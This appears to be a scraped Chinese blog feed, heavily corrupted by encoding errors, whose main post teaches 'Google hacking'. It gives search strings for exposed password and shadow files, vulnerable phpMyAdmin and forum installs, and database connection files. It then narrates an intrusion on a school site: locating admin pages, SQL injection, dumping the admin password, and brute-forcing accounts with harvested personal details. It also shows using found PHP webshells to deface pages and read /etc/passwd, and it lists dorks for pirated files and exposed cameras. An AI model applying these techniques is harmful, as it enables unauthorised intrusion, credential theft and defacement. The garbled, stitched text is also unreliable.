??xml version="1.0" encoding="utf-8" standalone="yes"?> Technorati Tags: Google
]]>
]]>
攉一些有用的链接先?br>
http://www.chinahobby.com/moji/lecture01_01.htm
http://tomoyasu.exblog.jp/pg/blog.asp?eid=c0053176&iid=3&acv=&dif=&opt=2&srl=642068&dte=2005%2D02%2D11+05%3A26%3A52%2E000
http://www.copyship.com/BBS/BBS_1024/bbs_index.asp
]]>
google
hacking其实q算不上什么新东西,当时q没有重视这U技?认ؓ(f)webshell什么的,q无太大实际用?google hacking其实q
如此?..
google hacking的简单实?
使用google中的一些语法可以提供给我们更多的信?当然也提供给那些?fn)惯d的h更多他们所惌?),下面来介绍一些常用的语法.
intext:
q个是把网中的正文内容中的某个字W做为搜索条?例如在google里输?intext:动网.返回所有在|页正文部分包含"动网"的网?
.allintext:使用Ҏ(gu)和intextcM.
intitle:
和上面那个intext差不?搜烦|页标题中是否有我们所要找的字W?例如搜烦:intitle:安全天.返回所有网|题中包含"安全天"的网
?同理allintitle:也同intitlecM.
cache:
搜烦google里关于某些内容的~存,有时候也许能扑ֈ一些好东西?
define:
搜烦某个词语的定?搜烦:define:hacker,返回关于hacker的定?
filetype:
q个我要重点推荐一?无论是撒|式dq是我们后面要说的对Ԏ勘杲行畔⑹占Ҏ(gu)玫UR?搜烦指定cd的文?例如输入
:filetype:doc.返回所有以docl尾的文件URL.当然如果你找.bak?mdb?inc也是可以?获得的信息也怼(x)更丰?
info:
查找指定站点的一些基本信?
inurl:
搜烦我们指定的字W是否存在于URL?例如输入:inurl:admin,返回N个类gq样的连?http://www.xxx.com/xxx/admin,用来扄理员?
陆的URL不错.allinurl也同inurlcM,可指定多个字W?
link:
例如搜烦:inurl:www.4ngel.net可以q回所有和www.4ngel.net做了链接的URL.
site:
q个也很有用,例如:site:www.4ngel.net.返回所有和4ngel.netq个站有关的URL.
对了q有一?作符也是很有用的:
+ 把google可能忽略的字列如查询范围
- 把某个字忽略
~ 同意?
. 单一的通配W?
* 通配W,可代表多个字?
"" _查询
下面开始说说实际应?
以下内容均在google上搜?对于一个居心叵的d者来?可能他最感兴的是密码文g?而google正因为其强大的搜索能力往往?
把一些敏感信息透露l他?用google搜烦以下内容:
intitle:"index of" etc
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd
有时候因为各U各L(fng)原因一些重要的密码文g被毫无保护的暴露在网l上,如果被别有用心的?那么危害是很大的
同样可以用google来搜索一些具有漏z的E序,例如ZeroBoard前段旉发现个文件代码泄露漏z?可以用google来找|上使用q套E序的站
?
intext:ZeroBoard filetype:php
或者?
inurlutlogin.php?_zb_path= site:.jp
来寻找我们所需要的面.phpmyadmin是一套功能强大的数据?作Y?一些站点由于配|失?D我们可以不用密码直接对phpmyadminq?
??我们可以用google搜烦存在q样漏洞的程序URL:
intitle:phpmyadmin intext:Create new
database
q记http://www.xxx.com/_vti_bin/..%5 ...
ystem32/cmd.exe?dir?用google找找Q你也许q可以找到很?
古董U的机器。同h们可以用q个找找有其他cgi漏洞的页面?
allinurlQwinnt system32
前面已经单的说过可以用google来搜索数据库文g,用上一些语法来_查找能够获得更多东西(access的数据库,mssql、mysql的连接文?
{等).举个例子CZ一?
allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
intitle:"index of" data
//在一些配|不正确的apache+win32的服务器上经常出现这U情?和上面的原理一?我们q可以用google来找?
?
利用google完全是可以对一个站点进行信息收集和渗透的Q下面我们用google对特定站点进行一ơ测试?
首先用google先看q个站点的一些基本情?一些细节部分就略去?:
site:xxxx.com
从返回的信息中,扑ֈ几个该校的几个系院的域名Q?
http://a1.xxxx.com
http://a2.xxxx.com
http://a3.xxxx.com
http://a4.xxxx.com
Zping了一下,应该是在不同的服务器.学校一般都?x)有不少好的资料Q先看看有什么好东西?
site:xxxx.com
filetype:doc
得到N个不错的doc?
先找扄站的理后台地址Q?
site:xxxx.com intext:理
site:xxxx.com inurl:login
site:xxxx.com intitle:理
过获得2个管理后台地址Q?
http://a2.xxxx.com/sys/admin_login.asp
http://a3.xxxx.com:88/_admin/login_in.asp
q算不错Q看看服务器上跑的是什么程序:(x)
site:a2.xxxx.com filetype:asp
site:a2.xxxx.com filetype:php
site:a2.xxxx.com filetype:aspx
site:a3.xxxx.com filetype:asp
site:.......
......
a2服务器用的应该是IISQ上面用的是asp的整站程序,q有一个php的论?
a3服务器也是IISQaspx+asp。webE序都应该是自己开发的。有论坛那就看看能不能遇见什么公qFTP帐号什么的Q?
site:a2.xxxx.com intext:ftp://*:*
没找C么有价值的东西。再看看有没有上传一cȝ漏洞Q?
site:a2.xxxx.com inurl:file
site:a3.xxxx.com inurl:load
在a2上发C个上传文件的面Q?
http://a2.xxxx.com/sys/uploadfile.asp
用IE看了一下,没权限访问。试试注,
site:a2.xxxx.com filetype:asp
得到N个asp面的地址Q体力活p软g做吧Q这套程序明显没有对注射做什么防范,dbowner权限Q虽然不高但已矣,back a shell不太?
Ƣ,而且看v来数据库的个头就不小Q直接把web理员的密码暴出来再_MD5加密q。一般学校的站点的密码都比较有规律,通常都是域名+
?sh)话一cȝ变ŞQ用google搞定吧?
site:xxxx.com //得到N个二U域?
site:xxxx.com
intext:*@xxxx.com //得到N个邮件地址Q还有邮qMh的名字什么的
site:xxxx.com intext:?sh)?//N个电(sh)?
把什么的信息做个字典吧,挂上慢慢跑。过了一D|间就跑出4个帐P2个是学生?x)的Q?个管理员Q还有一个可能是老师的帐受登陆上去:(x)
nameQ网站管理员
passQa2xxxx7619 //说了吧,是域名+4个数?
要再怎么提权那就不属于本文讨问了Q呵呵,到此为止?
q段旉在国外的一些google
hack的研I站点看了看Q其实也都差不多是一些基本语法的灉|q用Q或者配合某个脚本漏z,主要q是?
个h的灵zL维。国外对于google
hack斚w的防范也q不是很多,所以大家还是点Cؓ(f)止,不要L破坏拉,呵呵。对于一些在win上跑
apache的网们应该多注意一下这斚wQ一个intitle:index of差不多都出来了
1.查找利用php webshell
intitle:"php shell*" "Enable stderr" filetype:php
(?
intitle—网|?Enable stderr—UNIX标准输出和标准错误的~写filetype—文件类?。搜索结果中Q你能找到很多直接在机器上执
行命令的web
shell来。如果找到的PHPSHELL不会(x)利用Q如果你不熟(zhn)UNIXQ可以直接看看LISTQ这里就不详l说了,有很多利用h(hun)倹{要说明
的是Q我们这里搜索出来的一些国外的PHPSHELL上都要用UNIX命oQ都是system调用出来的函?其实用百度及其他搜烦引擎都可以,只是?
写搜索的内容不同)。这个PHPWEBSHELL是可以直接Echo(Unix常用命o)。一句话把首页搞定?
echo
"召唤" > index.jsp
现在看看首页Q已l被我们Ҏ(gu): "召唤" 了?
我们也可以用WGET上传一个文件上?比如你要替换的叶子吧)。然后execute Command输入 cat file >
index.html or echo "" > file
echo "test" >> file
q样一条条打出来,站点首页成功被替换了。同L(fng)也可?
uname -a;cat /etc/passwd
不过有点要注意,有些WEBSHELLE序有问题,执行不了的,
2.搜烦INC敏感信息
在google的搜索框中填?
Code:
.org filetype:inc
在搜索框上输入:(x) "index of/ " inurl:lib
再按搜烦你将q入许多图书馆,q且一定能下蝲自己喜欢的书c?google特别搜烦代码^_^
在搜索框上输入:(x) "index of/ " inurl:lib
再按搜烦你将q入许多图书馆,q且一定能下蝲自己喜欢的书c?
在搜索框上输入:(x) index of /" cnki
再按搜烦你就可以扑ֈ许多图书馆的CNKI、VIP、超星等入口Q?br>
在搜索框上输入:(x) "index of /" ppt
再按搜烦你就可以H破|站入口下蝲powerpint作品Q?br>
在搜索框上输入:(x) "index of /" mp3
再按搜烦你就可以H破|站入口下蝲mp3、rm{媄视作品!
在搜索框上输入:(x) "index of /" swf
再按搜烦你就可以H破|站入口下蝲flash作品Q?br>
在搜索框上输入:(x) "index of /" 要下载的软g?br>
再按搜烦你就可以H破|站入口下蝲软gQ?br>
inurl:"ViewerFrame?Mode="
]]>
]]>
]]>
再次查询的时候又好了Q难道Google真的有了查病毒的功能Q?BR>
附上截图Q?BR>
]]>
原代码:(x)
<legend><A HREF="http://www.google.com/">
<IMG SRC="http://www.google.com/logos/Logo_25wht.gif"
border="0" ALT="Google"></A></legend>
<FORM method=GET action="http://www.google.com/search">
<INPUT TYPE=hidden name=ie value=GB2312>
<INPUT TYPE=hidden name=oe value=GB2312>
<INPUT TYPE=hidden name="hl" value="zh-CN">
<INPUT TYPE=text name=q maxlength=255 value="">
<font size=-1>
<INPUT TYPE=hidden name=domains value="Treacle"><br>
<INPUT TYPE=radio name=sitesearch value=""> WWW
<INPUT TYPE=radio name=sitesearch value="http://www.aygfsteel.com/blake" checked> Treacle <br>
</font>
<INPUT TYPE=submit name=btnG VALUE="Google Search">
</FORM>
</fieldset>
应有效果Q?BR>
WWW Treacle
]]>
Technorati Tags: Technorati | Tag | FireFox